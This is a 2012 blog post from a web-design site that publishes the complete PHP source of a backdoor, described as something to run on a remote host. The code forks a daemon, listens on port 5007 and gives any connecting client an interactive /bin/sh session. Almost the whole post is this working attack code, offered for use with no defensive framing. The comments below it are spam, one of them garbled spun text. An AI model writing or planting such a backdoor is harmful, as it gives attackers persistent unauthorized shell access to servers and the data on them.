A Php Backdoor Source Code

forever2sky Web design skills 5 comments 1,837 views　12.19.2012

This is a shell backdoor source code written in php script.Run it on a remote host.It will run to listen a port 5007.When you connect the remote host ,it will open a shell.But when i execute a command on the shell interface,i do not know if the instruction has been executed.It means i am not sure if the instruction is running or completed.

The source code :

<? php

error_reporting(0);
set_time_limit(0);

define('LISTEN_PORT', '5007');
define('TIMEOUT_SECONDS', 15 * 60); // timeout for the client connection
define('SHUTDOWN_CMD', 'shutdownbd'); // shuts down the daemon when the client sends this
define('USLEEP_COMMAND_WAIT', 100000); // how much to halt in the loop for reading commands from the client
define('USLEEP_NEWUSER_WAIT', 1000000); // how much to halt in the loop for receiving connections
define('FANCY_SHELL', 0); // 1 or 0; fancy shell is `whoami`@`uname -n`:`pwd`$
define('BUF_SIZ', 2048);
define('FD_WRITE', 0);
define('FD_READ', 1);
define('FD_ERR', 2);

if (function_exists('pcntl_fork') === false) {
die('PCNTL functions not available on this PHP installation');
}

function my_socket_close($socket) {
socket_shutdown($socket);
socket_close($socket);
}

class Client {

private $socket;

    public function __construct($socket) {
        socket_set_nonblock($socket);
        $this->socket = $socket;
    }

    public function __destruct() {
        my_socket_close($this->socket);
    }

    public function Send($msg) {
        return socket_write($this->socket, $msg, strlen($msg));
    }

    public function Read() {
        return socket_read($this->socket, BUF_SIZ);
    }

}

class Shell {

private $cmd;
private $pipes;

    public function __construct() {
        $cmd = proc_open("/bin/sh", array(array("pipe", "r"), array("pipe", "w"), array("pipe", "w")), $pipes);
        if ($cmd !== false) {
            foreach ($pipes as $pipe) {
                stream_set_blocking($pipe, 0);
            }
            $this->pipes = $pipes;
            $this->cmd = $cmd;
        } else {
            throw new Exception("Couldn't run /bin/sh.");
        }
    }

    public function __destroy() {
        foreach ($this->pipes as $pipe) {
            fclose($pipe);
        }
        proc_close($this->cmd);
    }

    public function SendCMD($msg) {
        $msg = $msg . "\n";
        fwrite($this->pipes[FD_WRITE], $msg, strlen($msg));
    }

    public function Read() {
        return $this->recv($this->pipes[FD_READ]);
    }

    public function ReadErr() {
        return $this->recv($this->pipes[FD_ERR]);
    }

    public function GetShell() {
        if (FANCY_SHELL === 0) {
            return '$ ';
        }

        $this->SendCMD("whoami;");
        do {
            $whoami = $this->Read();
        } while (strlen($whoami) === 0);

        $this->SendCMD("uname -n;");
        do {
            $uname = $this->Read();
        } while (strlen($uname) === 0);

        $this->SendCMD("pwd;");
        do {
            $pwd = $this->Read();
        } while (strlen($pwd) === 0);

return trim($whoami) . "@" . trim($uname) . ":" . trim($pwd) . "$ ";
}

    private function recv($pipe) {
        do {
            $buf = fgets($pipe, BUF_SIZ);
            if (isset($buffer) === false) {
                $buffer = $buf;
            } else {
                $buffer .= $buf;
            }
        } while ($buf !== false);

return $buffer;
}

}

$master_socket = socket_create_listen(LISTEN_PORT);

if ($master_socket !== false) {
$pid = pcntl_fork();

    if ($pid) {
        exit;
    }

posix_setsid();

socket_set_nonblock($master_socket);

$pids = array();

while (true) {
$new_socket = socket_accept($master_socket);

if ($new_socket !== false) {
$pids[] = pcntl_fork();

$current_pid = $pids[count($pids) - 1];

if ($current_pid === 0) {
$client = new Client($new_socket);

$shell = new Shell();

$client->Send($shell->GetShell());

                $timeout = time();
                do {
                    if (time() - $timeout > TIMEOUT_SECONDS) {
                        break;
                    }

$command = $client->Read();
$command = trim($command);

$show_shell = false;

                    if ($command === ';') {
                        $command = '';
                        $show_shell = true;
                    }

                    if (strlen($command) !== 0) {
                        if ($command === SHUTDOWN_CMD) {
                            break 2;
                        }

                        if (substr($command, -1) !== ';') {
                            $command .= ';';
                        }

$shell->SendCMD($command);

$timeout = time();
}

                    $buffer = $shell->Read();
                    if ($buffer !== false) {
                        $is_read = true;
                        $client->Send($buffer);
                        $show_shell = true;
                    }

                    $errbuf = $shell->ReadErr();
                    if ($errbuf !== false) {
                        $is_read = true;
                        $client->Send($errbuf);
                        $show_shell = true;
                    }

                    if ($show_shell === true) {
                        $client->Send($shell->GetShell());
                    }

usleep(USLEEP_COMMAND_WAIT);
} while ($command !== 'exit;');

                unset($shell, $client);
                exit;
            }
        }
        usleep(USLEEP_NEWUSER_WAIT);
    }

    foreach ($pids AS $pid) {
        posix_kill($pid, SIGKILL);
    }

my_socket_close($master_socket);
}
else {
echo "Can't bind socket to port " . LISTEN_PORT . '.' . PHP_EOL;
}
?>

This address is http://www.computerites.com/web-design-skills/2012/12/a-php-backdoor-source-code-627.html

Go top

> Web design skills > A Php Backdoor Source Code

Backdoor

code

php

PHP code

remote host

source code

Girl Frozen For 500 Years

How to Fix Mshtml.dll Error ?

Optimize and Grow Your Google Adwords with Marin Software

Free $200 Advertising for Microsoft Adcenter from Marin Software

You would like these posts:

The Simple Skill to Crack PHP Base64_decode

How to Add Picture Alt Attribute Code Automatic in Wordpress

The DDOS Attacks Source Code in C Programming Language

Solution of HTTP Error 500.19- Internal Server Error

Solve the Problem of HTTP Error 403 Forbidden

the HTML Color Codes in Web Design

the Factors to Affect the Blog Rank in Google Search Rank

The Code of Automatic Adding Article Copyright Information to Prevent Copying

Can You Believe? Let Your Website Gain Optional Google Page Rank

40 Useful Javascript Tips

Temp Folder Permissions Problem Causes Site Failure in IIS PHP Environment

Solve a Strange Problem of HTTP Error 404.17 - Not Found

5 Responses to “ A Php Backdoor Source Code”

burberry scarf Reply 12/24/2012 02:47:32

Nobody can see yourself to mug you from a basement.
moncler jackets Reply 12/24/2012 20:55:29

When i recieved the Typical Smaller inside Saying last night and I seemed to be soooo enthusiastic! Immediately after When i opened this program, When i went to help the room in an attempt these people on the subject of… yet, i had to spend some time to truly have them on the subject of. Greatly assist brief measurements, they’re just a real hassel to get on the subject of, however, when they’re just on the subject of, it’s extremely worth their expense. When i surely recommend trying them up with hosiery for the reason that hosiery might help any ft . tumble found in simpler. Also i recommend Unquestionably buying these questions measurements along from the ordinary {moncler moka purple|moncler authentic|moncler chicago illinois|moncler outlet|moncler k2 se|negozi moncler italia|men’s moncler jackets on sale|moncler lucie black long down jacket with fur trimmed hood|moncler down jacket men’s|moncler shirts for men measurements. Originally as soon as i got my earliest two of negozi moncler italia in height african american a person’s) When i ordered these people during my regular measurements and at earliest it had been thoroughly alright, though when they have got extended, they can fit a lot of looser. They really are also bringable and I take pleasure in these people, however went a real measurements along during my innovative binocular. Most certainly a wise variety! If you can not have them a real measurements small, some might tumble onto your calcaneus really horrible as it is which means brief. Any time you order them a real measurements along, when you initially place them on they will likely feel a bit warm, try not to be anxious, they actually stretch your muscles! They really are surely minuscule, much too, ideal taking un-tucked/under any pants. Their particular certainly not heavy that i’m delighted with these
burberry outlet Reply 12/25/2012 19:39:33

Its probability are for that reason fantastic and working style so swift.
Mery Lucky Reply 12/31/2012 12:26:40

thank you so much for your dedication, it makes us readers come to your website everyday.
lita mary Reply 12/31/2012 21:12:00

you have got a really useful blog i have been here reading for about an hour. i am a newbie and your success is very much an inspiration for me.